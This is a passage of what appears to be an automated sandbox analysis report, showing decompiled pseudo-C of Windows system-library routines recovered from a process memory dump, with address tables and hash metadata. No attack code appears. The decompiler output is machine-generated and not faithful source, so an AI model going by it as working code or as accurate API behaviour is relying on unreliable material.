                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                      						if(_t88 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t101 = _t118 - 0x3c;
                                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                      						goto L21;
                                                                      					}
                                                                      					_t67 = 0xc0000017;
                                                                      					goto L28;
                                                                      				}
                                                                      				_push(0);
                                                                      				_push(0x20);
                                                                      				_push(_t118 - 0x60);
                                                                      				_push(0x5a);
                                                                      				_t94 = E01359860();
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                      				if(_t94 < 0) {
                                                                      					goto L29;
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                      					_t101 = L"Legacy";
                                                                      					_push(6);
                                                                      				} else {
                                                                      					_t101 = L"UEFI";
                                                                      					_push(4);
                                                                      				}
                                                                      				_pop(_t65);
                                                                      				goto L21;
                                                                      			}






















                                                                      0x013951be
                                                                      0x013951c3
                                                                      0x013951c8
                                                                      0x013951cd
                                                                      0x013951d0
                                                                      0x013951d3
                                                                      0x013951d8
                                                                      0x013951db
                                                                      0x013951de
                                                                      0x013951e0
                                                                      0x013951e3
                                                                      0x013951e6
                                                                      0x013951e8
                                                                      0x01395342
                                                                      0x01395351
                                                                      0x01395356
                                                                      0x0139535a
                                                                      0x01395360
                                                                      0x01395363
                                                                      0x01395366
                                                                      0x01395369
                                                                      0x01395369
                                                                      0x0139536b
                                                                      0x0139536b
                                                                      0x01395370
                                                                      0x013953a3
                                                                      0x013953a4
                                                                      0x013953a6
                                                                      0x013953ab
                                                                      0x013953ab
                                                                      0x013953ae
                                                                      0x013953ae
                                                                      0x013953b5
                                                                      0x013953bf
                                                                      0x013953bf
                                                                      0x01395375
                                                                      0x01395396
                                                                      0x013953a0
                                                                      0x013953a0
                                                                      0x00000000
                                                                      0x01395396
                                                                      0x01395377
                                                                      0x01395379
                                                                      0x0139537f
                                                                      0x0139538c
                                                                      0x01395390
                                                                      0x00000000
                                                                      0x01395390
                                                                      0x013951ee
                                                                      0x013951f1
                                                                      0x01395301
                                                                      0x01395310
                                                                      0x01395315
                                                                      0x01395318
                                                                      0x0139531b
                                                                      0x01395320
                                                                      0x0139532e
                                                                      0x01395331
                                                                      0x00000000
                                                                      0x01395331
                                                                      0x01395328
                                                                      0x01395329
                                                                      0x00000000
                                                                      0x01395329
                                                                      0x013951fa
                                                                      0x01395235
                                                                      0x01395236
                                                                      0x01395239
                                                                      0x0139523f
                                                                      0x01395240
                                                                      0x01395241
                                                                      0x01395242
                                                                      0x01395246
                                                                      0x01395247
                                                                      0x0139524e
                                                                      0x01395251
                                                                      0x01395267
                                                                      0x01395269
                                                                      0x0139526e
                                                                      0x0139527d
                                                                      0x0139527e
                                                                      0x01395281
                                                                      0x01395282
                                                                      0x01395287
                                                                      0x01395288
                                                                      0x0139528a
                                                                      0x0139528f
                                                                      0x01395294
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0139529a
                                                                      0x0139529c
                                                                      0x0139529e
                                                                      0x0139529e
                                                                      0x013952a4
                                                                      0x013952b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013952ba
                                                                      0x013952bc
                                                                      0x013952bc
                                                                      0x013952d4
                                                                      0x013952d9
                                                                      0x013952dc
                                                                      0x013952e1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013952e7
                                                                      0x013952f4
                                                                      0x00000000
                                                                      0x013952f4
                                                                      0x01395270
                                                                      0x00000000
                                                                      0x01395270
                                                                      0x013951fc
                                                                      0x013951fd
                                                                      0x01395202
                                                                      0x01395203
                                                                      0x01395205
                                                                      0x0139520a
                                                                      0x0139520f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0139521b
                                                                      0x01395226
                                                                      0x0139522b
                                                                      0x0139521d
                                                                      0x0139521d
                                                                      0x01395222
                                                                      0x01395222
                                                                      0x0139522d
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: 5a4146915aff89b3b160b593872825675d299eb3f3c958659cf645893f4f2d5e
                                                                      • Instruction ID: dffa87b2aa08cf5152c68a2a7188718adeafeba4d60d55c2ca8e449ca91b4073
                                                                      • Opcode Fuzzy Hash: 5a4146915aff89b3b160b593872825675d299eb3f3c958659cf645893f4f2d5e
                                                                      • Instruction Fuzzy Hash: A0515E71A006099FDF26DFA8C990BADBBF8FF58708F14406EE649EB251D7719940CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E0131B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                      				signed int _t65;
                                                                      				signed short _t69;
                                                                      				intOrPtr _t70;
                                                                      				signed short _t85;
                                                                      				void* _t86;
                                                                      				signed short _t89;
                                                                      				signed short _t91;
                                                                      				intOrPtr _t92;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr* _t98;
                                                                      				signed short _t99;
                                                                      				signed short _t101;
                                                                      				void* _t102;
                                                                      				char* _t103;
                                                                      				signed short _t104;
                                                                      				intOrPtr* _t110;
                                                                      				void* _t111;
                                                                      				void* _t114;
                                                                      				intOrPtr* _t115;
                                                                      
                                                                      				_t109 = __esi;
                                                                      				_t108 = __edi;
                                                                      				_t106 = __edx;
                                                                      				_t95 = __ebx;
                                                                      				_push(0x90);
                                                                      				_push(0x13ef7a8);
                                                                      				E0136D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                      				if(__edx == 0xffffffff) {
                                                                      					L6:
                                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                      					__eflags = _t65 & 0x00000002;
                                                                      					if((_t65 & 0x00000002) != 0) {
                                                                      						L3:
                                                                      						L4:
                                                                      						return E0136D130(_t95, _t108, _t109);
                                                                      					}
                                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                      					_t108 = 0;
                                                                      					_t109 = 0;
                                                                      					_t95 = 0;
                                                                      					__eflags = 0;
                                                                      					while(1) {
                                                                      						__eflags = _t95 - 0x200;
                                                                      						if(_t95 >= 0x200) {
                                                                      							break;
                                                                      						}
                                                                      						E0135D000(0x80);
                                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                      						_t108 = _t115;
                                                                      						_t95 = _t95 - 0xffffff80;
                                                                      						_t17 = _t114 - 4;
                                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                      						__eflags =  *_t17;
                                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t102 = _t110 + 1;
                                                                      						do {
                                                                      							_t85 =  *_t110;
                                                                      							_t110 = _t110 + 1;
                                                                      							__eflags = _t85;
                                                                      						} while (_t85 != 0);
                                                                      						_t111 = _t110 - _t102;
                                                                      						_t21 = _t95 - 1; // -129
                                                                      						_t86 = _t21;
                                                                      						__eflags = _t111 - _t86;
                                                                      						if(_t111 > _t86) {
                                                                      							_t111 = _t86;
                                                                      						}
                                                                      						E0135F3E0(_t108, _t106, _t111);
                                                                      						_t115 = _t115 + 0xc;
                                                                      						_t103 = _t111 + _t108;
                                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                      						_t89 = _t95 - _t111;
                                                                      						__eflags = _t89;
                                                                      						_push(0);
                                                                      						if(_t89 == 0) {
                                                                      							L15:
                                                                      							_t109 = 0xc000000d;
                                                                      							goto L16;
                                                                      						} else {
                                                                      							__eflags = _t89 - 0x7fffffff;
                                                                      							if(_t89 <= 0x7fffffff) {
                                                                      								L16:
                                                                      								 *(_t114 - 0x94) = _t109;
                                                                      								__eflags = _t109;
                                                                      								if(_t109 < 0) {
                                                                      									__eflags = _t89;
                                                                      									if(_t89 != 0) {
                                                                      										 *_t103 = 0;
                                                                      									}
                                                                      									L26:
                                                                      									 *(_t114 - 0xa0) = _t109;
                                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                                      									__eflags = _t109;
                                                                      									if(_t109 >= 0) {
                                                                      										L31:
                                                                      										_t98 = _t108;
                                                                      										_t39 = _t98 + 1; // 0x1
                                                                      										_t106 = _t39;
                                                                      										do {
                                                                      											_t69 =  *_t98;
                                                                      											_t98 = _t98 + 1;
                                                                      											__eflags = _t69;
                                                                      										} while (_t69 != 0);
                                                                      										_t99 = _t98 - _t106;
                                                                      										__eflags = _t99;
                                                                      										L34:
                                                                      										_t70 =  *[fs:0x30];
                                                                      										__eflags =  *((char*)(_t70 + 2));
                                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                                      											L40:
                                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                      											 *(_t114 - 4) = 1;
                                                                      											_push(_t114 - 0x74);
                                                                      											L0136DEF0(_t99, _t106);
                                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      											goto L3;
                                                                      										}
                                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                      											goto L40;
                                                                      										}
                                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                      										_push(_t99 & 0x0000ffff);
                                                                      										_push(_t108);
                                                                      										_push(1);
                                                                      										_t101 = E0135B280();
                                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                      											__eflags = _t101 - 0x80000003;
                                                                      											if(_t101 == 0x80000003) {
                                                                      												E0135B7E0(1);
                                                                      												_t101 = 0;
                                                                      												__eflags = 0;
                                                                      											}
                                                                      										}
                                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      										goto L4;
                                                                      									}
                                                                      									__eflags = _t109 - 0x80000005;
                                                                      									if(_t109 == 0x80000005) {
                                                                      										continue;
                                                                      									}
                                                                      									break;
                                                                      								}
                                                                      								 *(_t114 - 0x90) = 0;
                                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                      								_t91 = E0135E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                      								_t115 = _t115 + 0x10;
                                                                      								_t104 = _t91;
                                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                      								__eflags = _t104;
                                                                      								if(_t104 < 0) {
                                                                      									L21:
                                                                      									_t109 = 0x80000005;
                                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                                      									L22:
                                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                      									L23:
                                                                      									 *(_t114 - 0x94) = _t109;
                                                                      									goto L26;
                                                                      								}
                                                                      								__eflags = _t104 - _t92;
                                                                      								if(__eflags > 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								if(__eflags == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L15;
                                                                      						}
                                                                      					}
                                                                      					__eflags = _t109;
                                                                      					if(_t109 >= 0) {
                                                                      						goto L31;
                                                                      					}
                                                                      					__eflags = _t109 - 0x80000005;
                                                                      					if(_t109 != 0x80000005) {
                                                                      						goto L31;
                                                                      					}
                                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                      					_t38 = _t95 - 1; // -129
                                                                      					_t99 = _t38;
                                                                      					goto L34;
                                                                      				}
                                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                      					__eflags = __edx - 0x65;
                                                                      					if(__edx != 0x65) {
                                                                      						goto L2;
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				L2:
                                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                                      				_push(_t106);
                                                                      				if(E0135A890() != 0) {
                                                                      					goto L6;
                                                                      				}
                                                                      				goto L3;
                                                                      			}






















                                                                      0x0131b171
                                                                      0x0131b171
                                                                      0x0131b171
                                                                      0x0131b171
                                                                      0x0131b171
                                                                      0x0131b176
                                                                      0x0131b17b
                                                                      0x0131b180
                                                                      0x0131b186
                                                                      0x0131b18f
                                                                      0x0131b198
                                                                      0x0131b1a4
                                                                      0x0131b1aa
                                                                      0x01374802
                                                                      0x01374802
                                                                      0x01374805
                                                                      0x0137480c
                                                                      0x0137480e
                                                                      0x0131b1d1
                                                                      0x0131b1d3
                                                                      0x0131b1de
                                                                      0x0131b1de
                                                                      0x01374817
                                                                      0x0137481e
                                                                      0x01374820
                                                                      0x01374822
                                                                      0x01374822
                                                                      0x01374824
                                                                      0x01374824
                                                                      0x0137482a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01374835
                                                                      0x0137483a
                                                                      0x0137483d
                                                                      0x0137483f
                                                                      0x01374842
                                                                      0x01374842
                                                                      0x01374842
                                                                      0x01374846
                                                                      0x0137484c
                                                                      0x0137484e
                                                                      0x01374851
                                                                      0x01374851
                                                                      0x01374853
                                                                      0x01374854
                                                                      0x01374854
                                                                      0x01374858
                                                                      0x0137485a
                                                                      0x0137485a
                                                                      0x0137485d
                                                                      0x0137485f
                                                                      0x01374861
                                                                      0x01374861
                                                                      0x01374866
                                                                      0x0137486b
                                                                      0x0137486e
                                                                      0x01374871
                                                                      0x01374876
                                                                      0x01374876
                                                                      0x01374878
                                                                      0x0137487b
                                                                      0x01374884
                                                                      0x01374884
                                                                      0x00000000
                                                                      0x0137487d
                                                                      0x0137487d
                                                                      0x01374882
                                                                      0x01374889
                                                                      0x01374889
                                                                      0x0137488f
                                                                      0x01374891
                                                                      0x013748e0
                                                                      0x013748e2
                                                                      0x013748e4
                                                                      0x013748e4
                                                                      0x013748e7
                                                                      0x013748e7
                                                                      0x013748ed
                                                                      0x013748f4
                                                                      0x013748f6
                                                                      0x01374951
                                                                      0x01374951
                                                                      0x01374953
                                                                      0x01374953
                                                                      0x01374956
                                                                      0x01374956
                                                                      0x01374958
                                                                      0x01374959
                                                                      0x01374959
                                                                      0x0137495d
                                                                      0x0137495d
                                                                      0x0137495f
                                                                      0x0137495f
                                                                      0x01374965
                                                                      0x01374969
                                                                      0x013749ba
                                                                      0x013749ba
                                                                      0x013749c1
                                                                      0x013749c5
                                                                      0x013749cc
                                                                      0x013749d4
                                                                      0x013749d7
                                                                      0x013749da
                                                                      0x013749e4
                                                                      0x013749e5
                                                                      0x013749f3
                                                                      0x01374a02
                                                                      0x00000000
                                                                      0x01374a02
                                                                      0x01374972
                                                                      0x01374974
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01374976
                                                                      0x01374979
                                                                      0x01374982
                                                                      0x01374983
                                                                      0x01374984
                                                                      0x0137498b
                                                                      0x0137498d
                                                                      0x01374991
                                                                      0x01374993
                                                                      0x01374999
                                                                      0x0137499d
                                                                      0x013749a2
                                                                      0x013749a2
                                                                      0x013749a2
                                                                      0x01374999
                                                                      0x013749ac
                                                                      0x00000000
                                                                      0x013749b3
                                                                      0x013748f8
                                                                      0x013748fe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013748fe
                                                                      0x01374895
                                                                      0x0137489c
                                                                      0x013748ad
                                                                      0x013748b2
                                                                      0x013748b5
                                                                      0x013748b7
                                                                      0x013748ba
                                                                      0x013748bc
                                                                      0x013748c6
                                                                      0x013748c6
                                                                      0x013748cb
                                                                      0x013748d1
                                                                      0x013748d4
                                                                      0x013748d8
                                                                      0x013748d8
                                                                      0x00000000
                                                                      0x013748d8
                                                                      0x013748be
                                                                      0x013748c0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013748c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013748c4
                                                                      0x00000000
                                                                      0x01374882
                                                                      0x0137487b
                                                                      0x01374904
                                                                      0x01374906
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01374908
                                                                      0x0137490e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01374910
                                                                      0x01374917
                                                                      0x01374917
                                                                      0x00000000
                                                                      0x01374917
                                                                      0x0131b1ba
                                                                      0x013747f9
                                                                      0x013747fc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013747fc
                                                                      0x0131b1c0
                                                                      0x0131b1c0
                                                                      0x0131b1c3
                                                                      0x0131b1cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: 0ecdce4a92ae74c52dc5d4844a6837709d4b0d4591cdd2d53154f7a769a3ee8e
                                                                      • Instruction ID: 1e07c44b1006534f464f9852190cff907a31c2e55031011978fab9a403b6023e
                                                                      • Opcode Fuzzy Hash: 0ecdce4a92ae74c52dc5d4844a6837709d4b0d4591cdd2d53154f7a769a3ee8e
                                                                      • Instruction Fuzzy Hash: 7451F171D002599FEB31CF68C844BAEBFB0BF05718F1041ADD859AB286D7796941CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E0133B944(signed int* __ecx, char __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				signed int* _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				char _v77;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				char* _t73;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr _t78;
                                                                      				signed int _t82;
                                                                      				intOrPtr _t83;
                                                                      				void* _t87;
                                                                      				char _t88;
                                                                      				intOrPtr* _t89;
                                                                      				intOrPtr _t91;
                                                                      				void* _t97;
                                                                      				intOrPtr _t100;
                                                                      				void* _t102;
                                                                      				void* _t107;
                                                                      				signed int _t108;
                                                                      				intOrPtr* _t112;
                                                                      				void* _t113;
                                                                      				intOrPtr* _t114;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t117;
                                                                      				signed int _t118;
                                                                      				void* _t130;
                                                                      
                                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                      				_v8 =  *0x140d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                      				_t112 = __ecx;
                                                                      				_v77 = __edx;
                                                                      				_v48 = __ecx;
                                                                      				_v28 = 0;
                                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                                      				_t105 =  *_t5;
                                                                      				_v20 = 0;
                                                                      				_v16 = 0;
                                                                      				if(_t105 == 0) {
                                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                                      					_t60 =  *__ecx |  *_t50;
                                                                      					if(( *__ecx |  *_t50) != 0) {
                                                                      						 *__ecx = 0;
                                                                      						__ecx[1] = 0;
                                                                      						if(E01337D50() != 0) {
                                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t65 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t65 != 0) {
                                                                      							E013E8CD6(_t112);
                                                                      						}
                                                                      						_push(0);
                                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t52);
                                                                      						_t60 = E01359E20();
                                                                      					}
                                                                      					L20:
                                                                      					_pop(_t107);
                                                                      					_pop(_t113);
                                                                      					_pop(_t87);
                                                                      					return E0135B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                      				}
                                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                                      				_t67 =  *_t8;
                                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                      				_t108 =  *(_t67 + 0x14);
                                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                      				_t105 = 0x2710;
                                                                      				asm("sbb eax, edi");
                                                                      				_v44 = _t88;
                                                                      				_v52 = _t108;
                                                                      				_t60 = E0135CE00(_t97, _t68, 0x2710, 0);
                                                                      				_v56 = _t60;
                                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                      					L3:
                                                                      					 *(_t112 + 0x44) = _t60;
                                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                                      					 *_t112 = _t88;
                                                                      					 *(_t112 + 4) = _t108;
                                                                      					_v20 = _t60 * 0x2710;
                                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                                      					if(_v77 != 0) {
                                                                      						L16:
                                                                      						_v36 = _t88;
                                                                      						_v32 = _t108;
                                                                      						if(E01337D50() != 0) {
                                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t73 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t73 != 0) {
                                                                      							_t105 = _v40;
                                                                      							E013E8F6A(_t112, _v40, _t88, _t108);
                                                                      						}
                                                                      						_push( &_v28);
                                                                      						_push(0);
                                                                      						_push( &_v36);
                                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t48);
                                                                      						_t60 = E0135AF60();
                                                                      						goto L20;
                                                                      					} else {
                                                                      						_t89 = 0x7ffe03b0;
                                                                      						do {
                                                                      							_t114 = 0x7ffe0010;
                                                                      							do {
                                                                      								_t77 =  *0x1408628; // 0x0
                                                                      								_v68 = _t77;
                                                                      								_t78 =  *0x140862c; // 0x0
                                                                      								_v64 = _t78;
                                                                      								_v72 =  *_t89;
                                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                      								while(1) {
                                                                      									_t105 =  *0x7ffe000c;
                                                                      									_t100 =  *0x7ffe0008;
                                                                      									if(_t105 ==  *_t114) {
                                                                      										goto L8;
                                                                      									}
                                                                      									asm("pause");
                                                                      								}
                                                                      								L8:
                                                                      								_t89 = 0x7ffe03b0;
                                                                      								_t115 =  *0x7ffe03b0;
                                                                      								_t82 =  *0x7FFE03B4;
                                                                      								_v60 = _t115;
                                                                      								_t114 = 0x7ffe0010;
                                                                      								_v56 = _t82;
                                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                                      							_t83 =  *0x1408628; // 0x0
                                                                      							_t116 =  *0x140862c; // 0x0
                                                                      							_v76 = _t116;
                                                                      							_t117 = _v68;
                                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                                      						asm("sbb edx, [esp+0x24]");
                                                                      						_t102 = _t100 - _v60 - _t117;
                                                                      						_t112 = _v48;
                                                                      						_t91 = _v44;
                                                                      						asm("sbb edx, eax");
                                                                      						_t130 = _t105 - _v52;
                                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                      							_t88 = _t102 - _t91;
                                                                      							asm("sbb edx, edi");
                                                                      							_t108 = _t105;
                                                                      						} else {
                                                                      							_t88 = 0;
                                                                      							_t108 = 0;
                                                                      						}
                                                                      						goto L16;
                                                                      					}
                                                                      				} else {
                                                                      					if( *(_t112 + 0x44) == _t60) {
                                                                      						goto L20;
                                                                      					}
                                                                      					goto L3;
                                                                      				}
                                                                      			}
















































                                                                      0x0133b94c
                                                                      0x0133b956
                                                                      0x0133b95c
                                                                      0x0133b95e
                                                                      0x0133b964
                                                                      0x0133b969
                                                                      0x0133b96d
                                                                      0x0133b96d
                                                                      0x0133b970
                                                                      0x0133b974
                                                                      0x0133b97a
                                                                      0x0133badf
                                                                      0x0133badf
                                                                      0x0133bae2
                                                                      0x0133bae4
                                                                      0x0133bae6
                                                                      0x0133baf0
                                                                      0x01382cb8
                                                                      0x0133baf6
                                                                      0x0133baf6
                                                                      0x0133baf6
                                                                      0x0133bafd
                                                                      0x0133bb1f
                                                                      0x0133bb1f
                                                                      0x0133baff
                                                                      0x0133bb00
                                                                      0x0133bb00
                                                                      0x0133bb03
                                                                      0x0133bb03
                                                                      0x0133bacb
                                                                      0x0133bacf
                                                                      0x0133bad0
                                                                      0x0133bad1
                                                                      0x0133badc
                                                                      0x0133badc
                                                                      0x0133b980
                                                                      0x0133b980
                                                                      0x0133b988
                                                                      0x0133b98b
                                                                      0x0133b98d
                                                                      0x0133b990
                                                                      0x0133b993
                                                                      0x0133b999
                                                                      0x0133b99b
                                                                      0x0133b9a1
                                                                      0x0133b9a5
                                                                      0x0133b9aa
                                                                      0x0133b9b0
                                                                      0x0133b9bb
                                                                      0x0133b9c0
                                                                      0x0133b9c3
                                                                      0x0133b9ca
                                                                      0x0133b9cc
                                                                      0x0133b9cf
                                                                      0x0133b9d3
                                                                      0x0133b9d7
                                                                      0x0133ba94
                                                                      0x0133ba94
                                                                      0x0133ba98
                                                                      0x0133baa3
                                                                      0x01382ccb
                                                                      0x0133baa9
                                                                      0x0133baa9
                                                                      0x0133baa9
                                                                      0x0133bab1
                                                                      0x01382cd5
                                                                      0x01382cdd
                                                                      0x01382cdd
                                                                      0x0133babb
                                                                      0x0133babc
                                                                      0x0133bac2
                                                                      0x0133bac3
                                                                      0x0133bac3
                                                                      0x0133bac6
                                                                      0x00000000
                                                                      0x0133b9dd
                                                                      0x0133b9dd
                                                                      0x0133b9e7
                                                                      0x0133b9e7
                                                                      0x0133b9ec
                                                                      0x0133b9ec
                                                                      0x0133b9f1
                                                                      0x0133b9f5
                                                                      0x0133b9fa
                                                                      0x0133ba00
                                                                      0x0133ba0c
                                                                      0x0133ba10
                                                                      0x0133ba10
                                                                      0x0133ba12
                                                                      0x0133ba18
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0133bb26
                                                                      0x0133bb26
                                                                      0x0133ba1e
                                                                      0x0133ba1e
                                                                      0x0133ba23
                                                                      0x0133ba25
                                                                      0x0133ba2c
                                                                      0x0133ba30
                                                                      0x0133ba35
                                                                      0x0133ba35
                                                                      0x0133ba41
                                                                      0x0133ba46
                                                                      0x0133ba4c
                                                                      0x0133ba50
                                                                      0x0133ba54
                                                                      0x0133ba6a
                                                                      0x0133ba6e
                                                                      0x0133ba70
                                                                      0x0133ba74
                                                                      0x0133ba78
                                                                      0x0133ba7a
                                                                      0x0133ba7c
                                                                      0x0133ba8e
                                                                      0x0133ba90
                                                                      0x0133ba92
                                                                      0x0133bb14
                                                                      0x0133bb14
                                                                      0x0133bb16
                                                                      0x0133bb16
                                                                      0x00000000
                                                                      0x0133ba7c
                                                                      0x0133bb0a
                                                                      0x0133bb0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0133bb0f

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0133B9A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: 6944b1367c73e60c0ae59689493409fadad35a7755b43cf107111ae6f82f1ad8
                                                                      • Instruction ID: 13e35216c607417ca8d87a383c2c44d056e2d0a6c01fac4dd8f4c5bbedafa8ae
                                                                      • Opcode Fuzzy Hash: 6944b1367c73e60c0ae59689493409fadad35a7755b43cf107111ae6f82f1ad8
                                                                      • Instruction Fuzzy Hash: 9C517871A08705CFD721CF2DC58092AFBE9FBC8618F14896EE98587359D730E844CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
